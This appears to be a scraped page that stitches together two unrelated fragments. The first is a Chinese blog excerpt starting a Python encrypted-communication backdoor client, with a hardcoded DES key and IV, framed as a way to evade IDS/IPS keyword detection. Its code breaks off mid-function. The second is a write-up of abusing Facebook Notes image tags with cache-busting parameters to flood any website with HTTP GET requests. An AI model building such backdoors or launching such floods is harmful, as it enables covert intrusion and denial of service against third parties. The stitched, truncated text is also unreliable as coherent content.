python加密通讯后门

加密通讯内容过一些检测数据包匹配关键字的ips和ids还是可以的,简单的demo。 client.py # client import socket import time import binascii import base64 import pyDes import sys #use des iv = '2132435465768797' key = 'aa000000000000000000000002200000000000aa0000000d' #data = "afuckfucdfadf" #des def encrypt(iv,

Using Facebook Notes to DDoS any website

Facebook Notes allows users to include <img> tags. Whenever a <img> tag is used, Facebook crawls the image from the external server and caches it. Facebook will only cache the image once however using random get parameters the cache can be by-passed and the feature can be abused to cause a huge HTTP GET flood. Steps to re-create the bug as reported to Facebook Bug Bounty on March 03, 2014.